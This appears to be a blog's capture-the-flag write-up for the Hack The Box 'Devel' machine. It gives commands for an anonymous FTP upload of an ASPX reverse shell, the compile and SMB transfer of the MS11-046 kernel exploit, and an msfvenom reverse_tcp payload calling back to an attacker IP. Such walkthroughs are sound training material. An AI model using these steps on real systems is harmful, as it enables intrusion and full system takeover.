We are going to play with the DEVEL machine of Hack the box. Here we will learn how to pwn the machine and access the privilege shell. Our perspective to exploit the machine by the manual method to follow the OSCP level also. Devel –Hack the box lab is online machine and has the static IP 10.129.226.65.
Task: Capture the
user.txt and root.txt flag
Penetration Testing Methodologies
Manual Method
(OSCP)
Network Scanning
·
Nmap
Enumeration
·
Writable FTP
Exploitation
·
aspx shell upload
·
Capture user.txt file
Privilege Escalation
·
Kernel Privilege escalation
·
Administrator Privileges
Automate Method
(Metasploit)
Manual Method (OSCP)
Network Scanning
The first thing to do is Nmap scanning to identify the open
ports and services for which we will aggressively run the scan.
nmap –A 10.129.226.65
Through the enumeration, we get to know that only two ports
are open i.e. port 80 –HTTP with Microsoft IIS web server and port 21 –FTP show
that anonymous login is allowed.
So now our only avenue of attack is through port 80 and port
21.
In the first look, we navigate to port 80 in the browser
only home page is appearing.
http://10.129.226.65
Enumeration
Let’s move toward the port FTP.
As FTP Anonymous login vulnerability is appeared in the Nmap
Scan, by using that, we are going to log in FTP, Username: Anonymous, and
Password: Anonymous.
ftp 10.129.226.65
Okay, we’re in! Current directory has three files.
We know that IIS 7 generally either executes ASPX (ASP.NET)
or ASP.
So, we are likely to Google the aspx reverse shell.
In attacker (kali) machine, download the reverse shell aspx file
uing the below command:
wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
Open the shell.aspx file and edit the IP address (I.e.
Kali’s IP Address ) or can change port also (optional).
Exploitation
Back to the FTP, OPPS!! The connection gets close. So again login to the FTP and upload the reverse shell aspx as shown in the below image,
put shell.aspx
Shell.aspx file has been uploaded on the FTP server.
To run the malicious script (shell. aspx) execute the
following url in the web browser and simultaneously start a netcat listener on
the attack machine to receive the reverse shell when it’s executed.
Boooom!!! We will get the netcat session. Do the post
enumeration to fetch the flag file .But unfortunately access is denied on babis
and administrator directory.
So, let’s move forward to check the system info focus on OS
Name and Version i.e. Microsoft Windows7 N/A Build 7600, so probably vulnerable
to a bunch of exploits.
Let’s google to check the Microsoft Windows 7 exploits
Privilege Escalation
The kernel exploit (MS11-046) allows us to escalate privileges.
So we will go with this exploit.
On the attack (Kali) machine, Searchsploit EDB id 40564 to
know the concern exploits.
Ohh nice!! We get Local Priviliege escalation exploit and its
C file by default copied to the current directory.
Now time to compile the exploit, for compilation,mingw-64
must be installed. If we don’t have then we can install it from the below
command:
apt install mingw-64
Start the compilation by using the below command and output
file name as shell.exe
i686-w64-mingw32-gcc 40564.c -o shell.exe -lws2_32
After compilation, our next motto is to just transfer the executable
file into the victim’s machine. There are multiple methods to transfer the
file, our favorite one is SMB file transfer.
We start the impacket smbserver utility and the smb share
folder will configure under the name “share”.Follow the below command
impacket-smbserver share $(pwd) -smb2support
As Public directory has accessible permission so we copy the
shell.exe into it. Now the file is the Users/Public Directory.
Well done!! Finally, we execute the shell.exe and as soon as
it executes, the exploit will work and escalate the privileges.
“NTauthority/System “We Have system!!!
Now enumerate the babis and administrator directories to
capture the user.txt flag.
We already had a netcat session at the attacker’s machine
(kali),here also we can execute the shell.exe file.
Automate Method
(Metasploit)
Let’s use msfvenom to generate the reverse shell. Below is
the command to generate the aspx payload.
Msfvenom –p windows/meterpreter/reverse_tcp
lhost=10.10.14.123 lport=4444 –f aspx > revshell.aspx
Already we have discussed in the manual method, regarding
the FTP vulnerability of anonymous login. By using the same we log in to the
FTP and upload the rev shell.aspx onto the web server's root directory.
put revshell.aspx
After file transfer, we navigate the aspx file in the
browser.
10.129.226.65/revshell.aspx
On the other hand, we are starting msfconsole, selecting
multi handler module with reverse shell payload, and running the exploit.
We get the meterpreter session 1.
As we know web server IIS7 version 6.1.700 is old and exploitable
so we search the exploit according and get the ms10_015_kitrap0d exploit
module. Now, selecting this module and setting on session 1 we run the exploit.
Great!!! We have a meterpreter session again and through
getuid, we get to know that we have a system-level shell.
Now get the user’s flag as captured in the manual method
above.
0 comments:
Post a Comment